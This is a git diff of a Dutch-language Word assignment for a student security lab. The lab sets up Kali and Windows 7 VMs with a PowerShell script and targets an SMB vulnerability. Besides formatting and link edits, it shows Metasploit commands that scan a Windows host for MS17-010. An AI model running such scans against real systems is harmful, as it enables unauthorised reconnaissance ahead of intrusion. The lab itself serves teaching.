-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> exit"</w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Read-Host -Prompt "Press Enter to exit"</w:t>
       </w:r>
     </w:p>
     <w:sectPr>

--- a/Opdracht/OpdrachtNPE.docx
+++ b/Opdracht/OpdrachtNPE.docx
@@ -1838,9 +1838,8 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:sz w:val="20"/>
             <w:szCs w:val="20"/>
-            <w:lang w:val="nl-BE"/>
           </w:rPr>
-          <w:t>https://1drv.ms/u/s!AogJDZBrZX0_zJAM40pQ9drba2UTnw?e=kv9tgF</w:t>
+          <w:t>https://1drv.ms/u/s!AogJDZBrZX0_zJAM40pQ9drba2UTnw?e=hfsuss</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>

--- a/Opdracht/OpdrachtNPE.docx
+++ b/Opdracht/OpdrachtNPE.docx
@@ -1724,14 +1724,31 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> kan uitgevoerd worden. Deze stappen zijn te vinden in BIJLAGE</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> A</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> kan uitgevoerd worden. Deze stappen zijn te vinden in </w:t>
+      </w:r>
+      <w:hyperlink w:anchor="_Bijlage_A:_Configuratie" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="nl-BE"/>
+          </w:rPr>
+          <w:t>BIJLAG</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="nl-BE"/>
+          </w:rPr>
+          <w:t>E</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="nl-BE"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> A</w:t>
+        </w:r>
+      </w:hyperlink>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -1827,9 +1844,6 @@
         <w:t>:</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:hyperlink r:id="rId11" w:history="1">
@@ -1838,8 +1852,9 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:sz w:val="20"/>
             <w:szCs w:val="20"/>
+            <w:lang w:val="nl-BE"/>
           </w:rPr>
-          <w:t>https://1drv.ms/u/s!AogJDZBrZX0_zJAM40pQ9drba2UTnw?e=hfsuss</w:t>
+          <w:t>https://1drv.ms/u/s!AogJDZBrZX0_zJAf-iqBq83YS6D-9g?e=R7uF7d</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -1887,9 +1902,8 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:sz w:val="20"/>
             <w:szCs w:val="20"/>
-            <w:lang w:val="en-US"/>
           </w:rPr>
-          <w:t>https://1drv.ms/u/s!AogJDZBrZX0_zJALmPLn_sumFXD4ew?e=UC49WM</w:t>
+          <w:t>https://1drv.ms/u/s!AogJDZBrZX0_zJAeaBZyoUMbueghlQ?e=N6Ak1S</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -2315,51 +2329,54 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
-        <w:ind w:left="1440"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Vermijd het gebruik van </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. De </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>exploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> maakt gebruik van Wine, volgens veel bronnen is Wine met </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>su</w:t>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Scan </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">De scanner die hierna gebruikt wordt bekijkt of een target machine kwetsbaar is voor onze </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>smb</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2373,14 +2390,98 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t>rights</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> een slecht idee!</w:t>
+        <w:t>vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>use auxiliary/scanner/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>smb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/smb_ms17_010</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>set RHOSTS &lt;Windows IP&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>run</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2394,164 +2495,6 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Scan </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>vulnerability</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">De scanner die hierna gebruikt wordt bekijkt of een target machine kwetsbaar is voor onze </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>smb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>vulnerability</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="6"/>
-        </w:numPr>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>use auxiliary/scanner/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>smb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>/smb_ms17_010</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="6"/>
-        </w:numPr>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>set RHOSTS &lt;Windows IP&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="6"/>
-        </w:numPr>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>run</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -3425,6 +3368,33 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dit is een SMB </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>, dus machines die de SMB-service uitschakelden waren niet kwetsbaar. SMB is echter een vaak gebruikt protocol, en staat standaard ook ingeschakeld in Windows.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3472,6 +3442,8 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_Bijlage_A:_Configuratie"/>
+      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
@@ -4424,16 +4396,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t># Variables</w:t>
@@ -4441,16 +4414,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>$KALI_VM = '</w:t>
@@ -4458,8 +4432,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Kali_NPE</w:t>
@@ -4467,8 +4441,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>'</w:t>
@@ -4476,16 +4450,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>$WINDOWS_7_VM = 'Windows_7_NPE'</w:t>
@@ -4493,16 +4468,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>$RAM = '2048'</w:t>
@@ -4510,16 +4486,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>$CPU = '2'</w:t>
@@ -4527,16 +4504,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>$VRAM = '128'</w:t>
@@ -4544,16 +4522,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>$</w:t>
@@ -4561,8 +4540,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
@@ -4570,8 +4549,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> = "</w:t>
@@ -4579,8 +4558,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>natNPECV</w:t>
@@ -4588,8 +4567,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>"</w:t>
@@ -4597,25 +4576,27 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t># Append VirtualBox’s installation directory to the PATH environment variable to make things easier</w:t>
@@ -4623,16 +4604,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>$</w:t>
@@ -4641,8 +4623,8 @@
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Env:Path</w:t>
@@ -4651,8 +4633,8 @@
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> += ";C:\Program Files\Oracle\VirtualBox\"</w:t>
@@ -4660,25 +4642,27 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>#------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
@@ -4686,16 +4670,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t># 1. Setup Nat Network</w:t>
@@ -4703,16 +4688,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>#------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
@@ -4720,25 +4706,27 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t># Stop DHCP server process if it's running</w:t>
@@ -4746,16 +4734,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>$</w:t>
@@ -4763,8 +4752,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>dhcpProcess</w:t>
@@ -4772,8 +4761,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
